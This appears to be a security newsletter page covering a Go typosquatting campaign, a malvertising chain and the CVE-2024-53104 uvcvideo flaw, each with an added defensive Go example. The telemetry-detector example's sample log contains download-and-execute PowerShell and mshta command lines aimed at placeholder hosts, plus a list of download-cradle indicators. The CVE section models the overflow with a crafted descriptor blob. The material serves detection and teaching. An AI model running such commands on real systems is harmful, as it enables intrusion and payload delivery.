The Red Report Summary for Busy IT Pros
The Red Report 2025 by Picus Labs analyzed over one million malware samples and found that 93% of the malicious actions observed map to just 10 MITRE ATT&CK techniques, among them process injection, credential theft from password stores, and exfiltration over encrypted channels.
Key insights:
🔹 Credential theft tripled: password managers and browser-saved logins are prime targets.
🔹 Attackers stay hidden longer, relying on stealthy execution and encrypted command-and-control channels.
🔹 Ransomware has moved to double extortion: data is stolen before it is encrypted and leaked if the ransom is not paid.
🔹 Proactive security is critical: MFA, behavior-based detection, and Zero Trust are must-haves.
We’ve distilled the 110-page report into a 7-minute read for busy IT pros. Read the full summary here and get straight to the most important takeaways.

Security researchers have uncovered a campaign against the Go ecosystem: seven weaponized packages that impersonate popular Go libraries and install hidden malware on Linux and macOS systems.
The packages borrow the names of legitimate libraries and use obfuscation to disguise their malicious code. Key highlights:
• Targeting developers: aimed at developers working on Linux, macOS and other UNIX-like systems.
• Impersonation: four packages mimic the hypert library and three the layout library.
• Financial focus: one variant is aimed at developers in the financial sector and uses deceptive domain names to look legitimate.
• Execution technique: the malicious functions fetch and run scripts from attacker-controlled domains, after a built-in delay meant to slip past sandboxes and quick reviews.
As these threats evolve, developers should scan dependencies as they are added, audit third-party code, and verify package integrity before trusting a module. The check that matters most here is that the full module path, not just the package name, belongs to the upstream author: a look-alike package passes checksum verification just as cleanly as the real one. This campaign underscores the need for vigilance in software development and package management.
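Checksum verification (go.sum and the checksum database) proves that the module you fetched is the one everybody else fetched, not that it is the one you meant to fetch, so a typosquat passes `go mod verify` cleanly. The program below is an added example, my own and not code from the page or from the researchers who reported the campaign, that reviews a go.mod against a project allowlist and flags required modules that reuse a trusted package name under a different module path or sit one edit away from one. The go.mod content, the `trusted-org`, `not-the-author` and `other-org` owners and the allowlist are all constructed; `hypert` and `layout` are only the library names the post mentions. In the sample, the second require line reuses a trusted name under another owner and the fourth is a one-character typo.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

type Finding struct{ Required, LooksLike, Reason string }

// requiredModules returns the module paths inside a go.mod require block.
func requiredModules(gomod string) []string {
	var mods []string
	inBlock := false
	sc := bufio.NewScanner(strings.NewReader(gomod))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		switch {
		case strings.HasPrefix(line, "require ("):
			inBlock = true
		case inBlock && line == ")":
			inBlock = false
		case inBlock && line != "":
			mods = append(mods, strings.Fields(line)[0])
		}
	}
	return mods
}

// lastElem is the final path element, the name a developer types in an import.
func lastElem(p string) string { return p[strings.LastIndex(p, "/")+1:] }

// editDistance is Levenshtein distance, used to catch one-character typos.
func editDistance(a, b string) int {
	ra, rb := []rune(a), []rune(b)
	prev := make([]int, len(rb)+1)
	for j := range prev {
		prev[j] = j
	}
	for i := 1; i <= len(ra); i++ {
		cur := make([]int, len(rb)+1)
		cur[0] = i
		for j := 1; j <= len(rb); j++ {
			best := prev[j-1] // substitution, free when the runes match
			if ra[i-1] != rb[j-1] {
				best++
			}
			if prev[j]+1 < best { // deletion
				best = prev[j] + 1
			}
			if cur[j-1]+1 < best { // insertion
				best = cur[j-1] + 1
			}
			cur[j] = best
		}
		prev = cur
	}
	return prev[len(rb)]
}

// findImpersonations flags modules off the allowlist that reuse a trusted package name under another path, or sit one edit away from one.
func findImpersonations(required, trusted []string) []Finding {
	allow := map[string]bool{}
	for _, t := range trusted {
		allow[t] = true
	}
	var out []Finding
	for _, r := range required {
		for _, t := range trusted {
			if allow[r] {
				break // exact allowlist hit, nothing to compare
			}
			switch rn, tn := lastElem(r), lastElem(t); {
			case rn == tn:
				out = append(out, Finding{r, t, "same package name under a different module path"})
			case editDistance(rn, tn) == 1:
				out = append(out, Finding{r, t, "package name is one edit away from a trusted module"})
			}
		}
	}
	return out
}

// Constructed go.mod: hypert and layout are the library names the campaign borrowed; every owner here is made up.
const sampleGoMod = `module example.com/app
require (
	github.com/trusted-org/hypert v0.2.0
	github.com/not-the-author/hypert v0.2.1
	github.com/trusted-org/layout v1.0.0
	github.com/other-org/layoutt v1.0.0
	golang.org/x/text v0.14.0
)`

// trustedModules is the project's review-approved allowlist (constructed).
var trustedModules = []string{"github.com/trusted-org/hypert", "github.com/trusted-org/layout", "golang.org/x/text"}

func main() {
	for _, f := range findImpersonations(requiredModules(sampleGoMod), trustedModules) {
		fmt.Printf("SUSPECT %s resembles %s: %s\n", f.Required, f.LooksLike, f.Reason)
	}
}
```

Run it in CI against the real go.mod and a checked-in allowlist; anything it flags needs a human to confirm the module path before the dependency is merged. The allowlist, not the checksum, is what encodes "this is the author we meant".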
Microsoft has raised the alarm over a large-scale malvertising campaign that impacted nearly one million devices worldwide, attributed to the threat actor it tracks as Storm-0408.
The campaign marks a shift in tactics: illegal streaming sites carried malvertising redirectors that bounced visitors through intermediary sites to payloads hosted on GitHub and, in some cases, other platforms. Key highlights:
• Targets: both consumer and enterprise devices were hit, showing how indiscriminate the campaign was.
• Tactics used: a multi-stage chain of PowerShell, AutoIt scripts and living-off-the-land binaries (LOLBins), ending in data exfiltration.
• Payload staging: GitHub served as the main hosting platform for the first-stage payloads delivered by the redirects.
• Financial motives: evidence points to theft of sensitive financial data, cryptocurrency-related data in particular.
As criminals devise ever more intricate schemes, vigilance remains critical for users and businesses alike. For defenders, the concrete lesson is that a browser spawning a script host, or a script host pulling code from a public code-hosting site, is behavior worth alerting on in endpoint telemetry.
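The chain described above (a browser visit to a redirector, a script host pulling a first stage from GitHub, further stages through PowerShell, AutoIt and LOLBins) leaves a recognisable pattern in process-creation telemetry. The scorer below is an added example and not Microsoft's detection logic: it reads constructed process-creation records (the five-column CSV layout, the hostnames and paths, the `example-user` GitHub path and the `example-cdn.invalid` domain are all made up) and scores each script-host launch on who spawned it, whether its command line fetches from a public code-hosting site, and whether the binary runs from a user-writable directory. The indicator lists are assumptions to tune, not a product signature.

```go
package main

import (
	"fmt"
	"strings"
)

// Event is one process-creation record; Alert is an event that reached the threshold, with reasons.
type Event struct{ Time, Host, Parent, Image, CommandLine string }
type Alert struct{ Event Event; Score int; Why []string }

// Indicator sets: assumptions for the example, tune them to your own estate.
var (
	browsers     = map[string]bool{"chrome.exe": true, "msedge.exe": true, "firefox.exe": true, "brave.exe": true}
	scriptHosts  = map[string]bool{"powershell.exe": true, "pwsh.exe": true, "mshta.exe": true, "wscript.exe": true, "cscript.exe": true, "autoit3.exe": true}
	stagingHosts = []string{"raw.githubusercontent.com", "github.com"}
	cradleTokens = []string{"iwr ", "invoke-webrequest", "downloadstring", "downloadfile", "-enc", "frombase64string"}
)

// baseName lowercases a path and returns its final element.
func baseName(p string) string {
	p = strings.ToLower(p)
	return p[strings.LastIndexAny(p, `\/`)+1:]
}

func firstMatch(s string, tokens []string) (string, bool) {
	for _, t := range tokens {
		if strings.Contains(s, t) {
			return t, true
		}
	}
	return "", false
}

// score rates one event; anything that is not a script host scores 0.
func score(e Event) (int, []string) {
	child, parent := baseName(e.Image), baseName(e.Parent)
	if !scriptHosts[child] {
		return 0, nil
	}
	cl, img := strings.ToLower(e.CommandLine), strings.ToLower(e.Image)
	pts, why := 0, []string{}
	add := func(n int, r string) { pts += n; why = append(why, r) }
	if browsers[parent] {
		add(2, "script host spawned directly by a browser")
	}
	if scriptHosts[parent] {
		add(1, "script host spawned by another script host (staged chain)")
	}
	if strings.Contains(cl, "http://") || strings.Contains(cl, "https://") {
		add(2, "remote URL on the command line")
	}
	if h, ok := firstMatch(cl, stagingHosts); ok {
		add(2, "payload hosted on "+h)
	}
	if t, ok := firstMatch(cl, cradleTokens); ok {
		add(1, "download/decode cradle: "+strings.TrimSpace(t))
	}
	if strings.Contains(img, `\appdata\local\temp\`) || strings.Contains(img, `\users\public\`) {
		add(1, "script host running from a user-writable directory")
	}
	return pts, why
}

// parseLog reads the constructed CSV; SplitN keeps any commas inside the command line intact.
func parseLog(raw string) []Event {
	var evs []Event
	for _, line := range strings.Split(strings.TrimSpace(raw), "\n") {
		if f := strings.SplitN(line, ",", 5); len(f) == 5 {
			evs = append(evs, Event{f[0], f[1], f[2], f[3], f[4]})
		}
	}
	return evs
}

func detect(evs []Event, threshold int) []Alert {
	var out []Alert
	for _, e := range evs {
		if s, why := score(e); s >= threshold {
			out = append(out, Alert{e, s, why})
		}
	}
	return out
}

// Constructed sample telemetry (timestamp,host,parent_image,image,command_line), not real logs.
const sampleLog = `2025-03-06T10:01:12Z,ws-17,C:\Program Files\Google\Chrome\Application\chrome.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,powershell.exe -w hidden -ep bypass -c "iwr https://raw.githubusercontent.com/example-user/repo/main/stage1.txt -OutFile $env:TEMP\s1.ps1; & $env:TEMP\s1.ps1"
2025-03-06T10:01:20Z,ws-17,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,C:\Windows\System32\mshta.exe,mshta.exe https://example-cdn.invalid/loader.hta
2025-03-06T10:02:03Z,ws-04,C:\Windows\explorer.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,powershell.exe Get-ChildItem C:\Users\alice\Documents
2025-03-06T10:03:41Z,ws-09,C:\Program Files\Mozilla Firefox\firefox.exe,C:\Users\bob\AppData\Local\Temp\AutoIt3.exe,AutoIt3.exe C:\Users\bob\AppData\Local\Temp\update.a3x`

func main() {
	for _, a := range detect(parseLog(sampleLog), 3) {
		fmt.Printf("[score %d] %s: %s -> %s\n  %s\n", a.Score, a.Event.Host, baseName(a.Event.Parent), a.Event.Image, strings.Join(a.Why, "; "))
	}
}
```

With the threshold at 3 the browser-launched PowerShell download from GitHub, the follow-on mshta fetching a remote HTA, and the AutoIt binary launched from a Temp directory by a browser all alert, while an administrator's interactive PowerShell under explorer.exe scores 0. The reasons list is what an analyst needs to triage the alert; keep it in the event you ship to the SIEM.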
A newly released proof-of-concept (PoC) exploit has drawn attention to an out-of-bounds write vulnerability in the Linux kernel, tracked as CVE-2024-53104. The flaw sits in the USB Video Class (UVC) driver, uvcvideo, and can be used for local privilege escalation.
Key highlights:
• Root cause: when the driver parsed a device's streaming descriptors, frame descriptors of type UVC_VS_UNDEFINED were processed even though the buffer that receives parsed frames had not been sized to include them, which produces the out-of-bounds write.
• Attack vector: a malicious (or emulated) USB device that presents crafted descriptors; the parsing happens when the device is enumerated, so the attacker needs to attach a device rather than reach the host over the network.
• Impact: kernel memory corruption, which can crash the system or, with a working exploit, give arbitrary code execution in the kernel.
• Affected versions: Linux kernel 2.6.26 and later, up to the fixed releases; CVSS base score 7.8 (high).
Google has already shipped the fix in its Android security updates, and the Cybersecurity and Infrastructure Security Agency (CISA) has added the CVE to its Known Exploited Vulnerabilities (KEV) catalog, which indicates evidence of exploitation in the wild and means updates should not wait.
For users and administrators the recommendation is clear: apply the latest kernel patches, and tighten USB device policy, for example by restricting which device classes may be attached or by blocklisting the uvcvideo module on machines that never use a webcam, so that a hostile device cannot reach the vulnerable parser.
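To make the root cause concrete, here is an added model of the two passes involved, my own simplification for illustration and not the uvcvideo driver's code: a sizing pass that counts only the known frame subtypes before the frames array is allocated, and a parse pass whose frame loop is keyed on the frame subtype expected after each format descriptor. For a format that carries no frames (DV in this model) that expected subtype is 0, which is exactly UVC_VS_UNDEFINED, so descriptors of that subtype are parsed without ever having been counted. The subtype constants are the UVC specification's values; both descriptor blobs are constructed, and the model stores one byte per frame where the driver keeps a full record. The hardened variant skips the frame loop whenever the expected subtype is UVC_VS_UNDEFINED, and where the driver would write out of bounds the model returns an error instead.

```go
package main

import "fmt"

// bDescriptorSubtype values from the UVC class specification; 0x24 is CS_INTERFACE.
const (
	csInterface          = 0x24
	vsUndefined          = 0x00 // UVC_VS_UNDEFINED
	vsFormatUncompressed = 0x04
	vsFrameUncompressed  = 0x05
	vsFormatMJPEG        = 0x06
	vsFrameMJPEG         = 0x07
	vsFormatDV           = 0x0c
)

// split cuts a blob of [bLength, bDescriptorType, bDescriptorSubtype, ...] descriptors apart, stopping at a bad bLength.
func split(buf []byte) [][]byte {
	var out [][]byte
	for len(buf) >= 4 {
		n := int(buf[0])
		if n < 4 || n > len(buf) {
			break
		}
		out = append(out, buf[:n])
		buf = buf[n:]
	}
	return out
}

// countFrames is the sizing pass: only known frame subtypes are counted (the driver knows three, two are modelled).
func countFrames(descs [][]byte) int {
	n := 0
	for _, d := range descs {
		if d[1] == csInterface && (d[2] == vsFrameUncompressed || d[2] == vsFrameMJPEG) {
			n++
		}
	}
	return n
}

// frameTypeFor maps a format subtype to the frame subtype expected after it; a format with no frames (DV) yields 0.
func frameTypeFor(formatSubtype byte) (byte, bool) {
	switch formatSubtype {
	case vsFormatUncompressed:
		return vsFrameUncompressed, true
	case vsFormatMJPEG:
		return vsFrameMJPEG, true
	case vsFormatDV:
		return vsUndefined, true
	}
	return 0, false
}

// parseStreaming is the parse pass. Unfixed, the frame loop takes every descriptor whose subtype
// equals ftype, so after a DV format (ftype == 0) it also consumes UVC_VS_UNDEFINED descriptors that
// countFrames never budgeted for. Fixed, the loop is skipped when ftype is vsUndefined.
func parseStreaming(blob []byte, fixed bool) (nframes, capacity int, err error) {
	descs := split(blob)
	capacity = countFrames(descs)
	frames := make([]byte, capacity) // one subtype byte per frame stands in for the driver's record
	for i := 0; i < len(descs); {
		d := descs[i]
		i++
		ftype, isFormat := frameTypeFor(d[2])
		if d[1] != csInterface || !isFormat {
			continue
		}
		for i < len(descs) && (!fixed || ftype != vsUndefined) &&
			descs[i][1] == csInterface && descs[i][2] == ftype {
			if nframes >= capacity {
				return nframes, capacity, fmt.Errorf("frame %d would be written past a %d-entry frames array (subtype 0x%02x)", nframes, capacity, ftype)
			}
			frames[nframes] = descs[i][2]
			nframes++
			i++
		}
	}
	return nframes, capacity, nil
}

// Constructed descriptor blobs, not captured from a real device.
var benignBlob = []byte{
	0x05, csInterface, vsFormatMJPEG, 0x01, 0x02, // MJPEG format, two frames follow
	0x04, csInterface, vsFrameMJPEG, 0x01,
	0x04, csInterface, vsFrameMJPEG, 0x02,
}

var craftedBlob = []byte{
	0x04, csInterface, vsFormatDV, 0x01, // DV format: no frames expected, ftype == 0
	0x04, csInterface, vsUndefined, 0x01, // UVC_VS_UNDEFINED: never counted, yet matched
	0x04, csInterface, vsUndefined, 0x02, // by the unfixed loop
}

func main() {
	for _, fixed := range []bool{false, true} {
		n, c, err := parseStreaming(craftedBlob, fixed)
		fmt.Printf("fixed=%-5v parsed %d of %d budgeted frames, err=%v\n", fixed, n, c, err)
	}
}
```

The benign blob parses to two frames in both variants. The crafted blob gets a zero-entry frames array from the sizing pass, and the unfixed parse loop then tries to store its first frame at index 0 of that array: in the kernel that store lands in whatever follows the allocation, which is why a device you plug in can corrupt kernel memory before any video is ever streamed.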